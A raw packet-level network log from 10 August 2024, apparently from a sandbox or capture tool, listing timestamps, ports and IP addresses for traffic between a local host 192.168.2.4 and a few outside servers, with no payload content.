Aug 10, 2024 16:12:22.926668882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.926681995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.926695108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.926709890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.926714897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.926733971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.926758051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.934153080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934197903 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.934568882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934578896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934590101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934601068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934609890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.934618950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934628963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934638977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.934648991 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.934654951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934673071 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.934686899 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.934734106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934748888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934772968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.934784889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.934794903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934809923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934824944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934842110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934850931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.934866905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.934874058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.934899092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.934911013 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.935362101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.935374975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.935388088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.935401917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.935412884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.935424089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.935435057 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.935456991 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.935641050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.935681105 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.935775042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.935789108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.935801983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.935815096 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.935830116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.935836077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.935847998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.935863018 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.936204910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.936218023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.936232090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.936242104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.936253071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.936265945 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.936275005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.936290026 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.936296940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.936310053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.936319113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.936336040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.936343908 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.936352968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.936364889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.936373949 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.936384916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.936399937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.936422110 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.936449051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.936609030 CEST	443	49750	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:22.936671972 CEST	49750	443	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.937063932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.937074900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.937086105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.937098026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.937105894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.937119961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.937124014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.937144041 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.937159061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.942013979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942043066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942055941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942068100 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.942080021 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.942106009 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.942276001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942287922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942297935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942311049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.942317963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942336082 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.942363024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.942743063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942754030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942764044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942774057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942785978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.942791939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942804098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942811966 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.942821026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.942827940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.942859888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.943403959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.943413973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.943423986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.943434954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.943444014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.943453074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.943463087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.943470955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.943483114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.943490028 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.943506002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.943526983 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.944161892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.944176912 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.944190979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.944204092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.944216967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.944228888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.944238901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.944251060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.944263935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.944272995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.944286108 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.944294930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.944305897 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.944329023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.945099115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.945115089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.945128918 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.945139885 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.945152044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.945163012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.945171118 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.945183992 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.945198059 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.945210934 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.945229053 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.945235014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.945234060 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.945247889 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.945269108 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.945269108 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.945297956 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.946016073 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.946028948 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.946038961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.946049929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.946063042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.946068048 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.946078062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.946091890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.946105003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.946114063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.946126938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.946135998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.946147919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.946157932 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.946177959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.946182966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.946266890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.946995020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.947011948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.947024107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.947031975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.947045088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.947055101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.947063923 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.947072983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.947081089 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.947089911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.947102070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.947108030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.947118998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.947125912 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.947150946 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.947870016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.947884083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.947892904 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.947904110 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.947913885 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.947937965 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.947937012 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.947949886 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.947982073 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.947995901 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.948009968 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.948024988 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.948034048 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.948039055 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.948051929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.948054075 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.948074102 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.948106050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.948771000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.948786020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.948798895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.948812962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.948826075 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.948834896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.948849916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.948854923 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.948860884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.948870897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.948884010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.948892117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.948901892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.948909044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.948918104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.948942900 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.952501059 CEST	49750	443	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.952522039 CEST	443	49750	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:22.953461885 CEST	443	49750	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:22.953522921 CEST	49750	443	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.953902960 CEST	49750	443	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:22.970050097 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.970102072 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.970112085 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.970125914 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.970143080 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.970169067 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.970335960 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.970357895 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.970370054 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.970377922 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.970391035 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.970406055 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.970633030 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.970643997 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.970654011 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.970666885 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.970675945 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.970679045 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.970691919 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.970700026 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.970710993 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.970737934 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.971307039 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.971318960 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.971328020 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.971338987 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.971349955 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.971350908 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.971360922 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.971373081 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.971376896 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.971384048 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.971390009 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.971395969 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.971417904 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.971421003 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.971441984 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.971462011 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.972166061 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.972177029 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.972187042 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.972198009 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.972209930 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.972210884 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.972229958 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.972244024 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.000514030 CEST	443	49750	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:23.003976107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004216909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004230976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004242897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004256010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004270077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004283905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004314899 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.004314899 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.004314899 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.004314899 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.004424095 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.004534960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004548073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004559040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004570961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004585028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004595995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004607916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004617929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.004617929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.004617929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.004620075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004633904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.004638910 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.004705906 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.004705906 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.005419970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.005445957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.005507946 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.005541086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.005554914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.005582094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.005594969 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.005599022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.005606890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.005620956 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.005633116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.005634069 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.005634069 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.005634069 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.005645037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.005660057 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.005667925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.005671024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.005742073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.005742073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.006479025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.006491899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.006503105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.006515980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.006527901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.006540060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.006558895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.006587982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.006594896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.006594896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.006594896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.006596088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.006633997 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.007244110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.007257938 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.007272005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.007286072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.007299900 CEST	80	49740	147.45.44.104	192.168.2.4
